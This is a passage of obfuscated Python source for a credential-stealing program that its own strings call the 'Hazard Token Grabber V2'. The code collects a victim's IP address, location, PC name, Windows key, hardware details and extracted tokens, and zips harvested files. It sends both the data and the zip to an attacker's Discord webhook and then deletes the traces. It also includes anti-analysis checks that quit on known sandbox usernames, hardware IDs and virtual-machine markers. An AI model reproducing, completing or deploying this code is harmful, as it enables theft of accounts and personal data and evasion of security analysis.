O0OOO0O0000OOOO00 =O00O0O00OO00O00OO [0 ].replace (" ","á Žâ€¯")#line:488
OO0O0OO0O00OO00O0 =O00O0O00OO00O00OO [1 ].replace (" ","á Žâ€¯")#line:489
O0000O0OOOO0OO000 =["https://ipinfo.io/json","https://utilities.tk/network/info"]#line:491
OO000OOOOOOOO0OOO =choice (O0000O0OOOO0OO000 )#line:492
O000OO000000000O0 =httpx .get (OO000OOOOOOOO0OOO ).json ()#line:493
OO00OOOO0O00O00OO =O000OO000000000O0 .get ('ip')#line:495
O00OOO00OO00OO00O =O000OO000000000O0 .get ('city')#line:496
O0O0O0OOO000OO00O =O000OO000000000O0 .get ('country')#line:497
O0OOO0O0OOOO0O0O0 =O000OO000000000O0 .get ('region')#line:498
OO0OO0O0O0OO0O000 =O000OO000000000O0 .get ('org')#line:499
O0O0OO00OOOOO0OOO =O000OO000000000O0 .get ('loc')#line:500
O0000OO0O0OO0O00O ="https://www.google.com/maps/search/google+map++"+O0O0OO00OOOOO0OOO #line:501
_O00OO0OOOO000O000 =os .path .join (O0OO0OOOO0OOOO000 .appdata ,f'Hazard.V2-[{Victim}].zip')#line:503
O0OO00OO0OOO00O00 =zipfile .ZipFile (_O00OO0OOOO000O000 ,"w",zipfile .ZIP_DEFLATED )#line:504
OOOO000OO000OO000 =os .path .abspath (O0OO0OOOO0OOOO000 .dir )#line:505
for O0000O000OOO0O000 ,_OOO0OOO00O00OO000 ,OO0000OOO0O00O0O0 in os .walk (O0OO0OOOO0OOOO000 .dir ):#line:506
for OO000OOO0O0O0O00O in OO0000OOO0O00O0O0 :#line:507
O0O0O0O0OOOOOOO0O =os .path .abspath (os .path .join (O0000O000OOO0O000 ,OO000OOO0O0O0O00O ))#line:508
OOOOOO00000O0O00O =O0O0O0O0OOOOOOO0O [len (OOOO000OO000OO000 )+1 :]#line:509
O0OO00OO0OOO00O00 .write (O0O0O0O0OOOOOOO0O ,OOOOOO00000O0O00O )#line:510
O0OO00OO0OOO00O00 .close ()#line:511
OO0OOOOO0OO0O0000 =''#line:512
for O00O00OO0OOO00000 in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:513
OO0OOOOO0OO0O0000 +=f"・{O00O00OO0OOO00000}\n"#line:514
OOO0000OOOO000O0O =''#line:515
for OOO00OOOOOO000O00 in O0OO0OOOO0OOOO000 .tokens :#line:516
OOO0000OOOO000O0O +=f'{OOO00OOOOOO000O00}\n\n'#line:517
O0O0OOO00OO0O0000 =f"{len(OO0000OOO0O00O0O0)} Files Found: "#line:518
OOOO0O0O00OO0O0O0 ={'avatar_url':'https://quartzwarrior.xyz/Quartzgif.gif','embeds':[{'author':{'name':f'*{Victim}* Just ran Token Grabber','url':'https://github.com/Rdimo/Hazard-Token-Grabber-V2','icon_url':'https://quartzwarrior.xyz/Quartzgif.gif'},'color':176185 ,'description':f'[Google Maps Location]({O0000OO0O0OO0O00O})','fields':[{'name':'\u200b','value':f'''```fix
IP:á Žâ€¯{OO00OOOO0O00O00OO.replace(" ", "á Žâ€¯") if OO00OOOO0O00O00OO else "N/A"}
Org:á Žâ€¯{OO0OO0O0O0OO0O000.replace(" ", "á Žâ€¯") if OO0OO0O0O0OO0O000 else "N/A"}
City:á Žâ€¯{O00OOO00OO00OO00O.replace(" ", "á Žâ€¯") if O00OOO00OO00OO00O else "N/A"}
Region:á Žâ€¯{O0OOO0O0OOOO0O0O0.replace(" ", "á Žâ€¯") if O0OOO0O0OOOO0O0O0 else "N/A"}
Country:á Žâ€¯{O0O0O0OOO000OO00O.replace(" ", "á Žâ€¯") if O0O0O0OOO000OO00O else "N/A"}```
'''.replace (' ',''),'inline':True },{'name':'\u200b','value':f'''```fix
PCName: {Victim_pc.replace(" ", "á Žâ€¯")}
WinKey:á Žâ€¯{OO0O0OO0O00OO00O0}
Platform:á Žâ€¯{O0OOO0O0000OOOO00}
DiskSpace:á Žâ€¯{disk}GB
Ram:á Žâ€¯{ram}GB```
'''.replace (' ',''),'inline':True },{'name':'**Tokens:**','value':f'''```yaml
{OOO0000OOOO000O0O if OOO0000OOOO000O0O else "No tokens extracted"}```
'''.replace (' ',''),'inline':False },{'name':O0O0OOO00OO0O0000 ,'value':f'''```ini
[
{OO0OOOOO0OO0O0000.strip()}
]```
'''.replace (' ',''),'inline':False }],'footer':{'text':'🌟・Grabber by Quartz'}}]}#line:575
with open (_O00OO0OOOO000O000 ,'rb')as O00O00OO0OOO00000 :#line:576
if O0OO0OOOO0OOOO000 .hook_reg in O0OO0OOOO0OOOO000 .webhook :#line:577
httpx .post (O0OO0OOOO0OOOO000 .webhook ,json =OOOO0O0O00OO0O0O0 )#line:578
httpx .post (O0OO0OOOO0OOOO000 .webhook ,files ={'upload_file':O00O00OO0OOO00000 })#line:579
else :#line:580
from pyotp import TOTP #line:581
OOO00OO0O00O00OO0 =TOTP (O0OO0OOOO0OOOO000 .fetch_conf ('protection')).now ()#line:582
httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },json =OOOO0O0O00OO0O0O0 )#line:583
httpx .post (O0OO0OOOO0OOOO000 .webhook ,headers ={"Authorization":OOO00OO0O00O00OO0 },files ={'upload_file':O00O00OO0OOO00000 })#line:584
os .remove (_O00OO0OOOO000O000 )#line:585
class AntiDebug (Functions ):#line:588
inVM =False #line:589
def __init__ (O0O0O0000O00O00O0 ):#line:591
O0O0O0000O00O00O0 .processes =list ()#line:592
O0O0O0000O00O00O0 .blackListedUsers =["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]#line:597
O0O0O0000O00O00O0 .blackListedPCNames =["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]#line:602
O0O0O0000O00O00O0 .blackListedHWIDS =["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","79AF5279-16CF-4094-9758-F88A616D81B4","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",]#line:613
for O000OO00OOOOOOO0O in [O0O0O0000O00O00O0 .listCheck ,O0O0O0000O00O00O0 .registryCheck ,O0O0O0000O00O00O0 .specsCheck ]:#line:615
OO000O0O00000O0OO =threading .Thread (target =O000OO00OOOOOOO0O ,daemon =True )#line:616
O0O0O0000O00O00O0 .processes .append (OO000O0O00000O0OO )#line:617
OO000O0O00000O0OO .start ()#line:618
for O000OOOO0O0O000OO in O0O0O0000O00O00O0 .processes :#line:619
try :#line:620
O000OOOO0O0O000OO .join ()#line:621
except RuntimeError :#line:622
continue #line:623
def programExit (OOOO00OO00O0OOOO0 ):#line:625
OOOO00OO00O0OOOO0 .__class__ .inVM =True #line:626
def programKill (OOOO00O000O0OO0O0 ,O00O000OOOO000OO0 ):#line:628
try :#line:629
os .system (f"taskkill /F /T /IM {O00O000OOOO000OO0}")#line:630
except (PermissionError ,InterruptedError ,ChildProcessError ,ProcessLookupError ):#line:631
pass #line:632
def listCheck (OOO0000OOOOO00OOO ):#line:634
for OOOOO00O0000000O0 in [r'D:\Tools',r'D:\OS2',r'D:\NT3X']:#line:635
if os .path .exists (OOOOO00O0000000O0 ):#line:636
OOO0000OOOOO00OOO .programExit ()#line:637
for OO00O000O0000O0OO in OOO0000OOOOO00OOO .blackListedUsers :#line:639
if Victim ==OO00O000O0000O0OO :#line:640
OOO0000OOOOO00OOO .programExit ()#line:641
for O0O0O000O0O0OOOOO in OOO0000OOOOO00OOO .blackListedPCNames :#line:643
if Victim_pc ==O0O0O000O0O0OOOOO :#line:644
OOO0000OOOOO00OOO .programExit ()#line:645
try :#line:647
O0O0O00000O0O0000 =subprocess .check_output (r"wmic csproduct get uuid",creationflags =0x08000000 ).decode ().split ('\n')[1 ].strip ()#line:648
except Exception :#line:649
O0O0O00000O0O0000 =""#line:650
for O00OOOOOOO00OO00O in OOO0000OOOOO00OOO .blackListedHWIDS :#line:651
if O0O0O00000O0O0000 ==O00OOOOOOO00OO00O :#line:652
OOO0000OOOOO00OOO .programExit ()#line:653
def specsCheck (O000OOOOO000O00OO ):#line:655
if int (ram )<=2 :#line:657
O000OOOOO000O00OO .programExit ()#line:658
if int (disk )<=50 :#line:659
O000OOOOO000O00OO .programExit ()#line:660
if int (psutil .cpu_count ())<=1 :#line:661
O000OOOOO000O00OO .programExit ()#line:662
def registryCheck (OO0OO00O00O0OO000 ):#line:664
O0O0O0O0O000OOO00 =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")#line:665
OOOOOO000O00O00OO =os .system ("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")#line:666
if (O0O0O0O0O000OOO00 and OOOOOO000O00O00OO )!=1 :#line:667
OO0OO00O00O0OO000 .programExit ()#line:668
O00OO0O0O000OO00O =winreg .OpenKey (winreg .HKEY_LOCAL_MACHINE ,'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')#line:670
try :#line:671
O00OOO0O0O000O0OO =winreg .QueryValueEx (O00OO0O0O000OO00O ,'0')[0 ]#line:672
if ("VMware"or "VBOX")in O00OOO0O0O000O0OO :#line:673
OO0OO00O00O0OO000 .programExit ()#line:674
finally :#line:675
winreg .CloseKey (O00OO0O0O000OO00O )#line:676
if __name__ =="__main__"and os .name =="nt":#line:679
try :#line:680
httpx .get ('https://google.com')#line:681
except httpx .ConnectTimeout :#line:682
os ._exit (0 )#line:683
asyncio .run (HazardTokenGrabberV2 ().init ())#line:684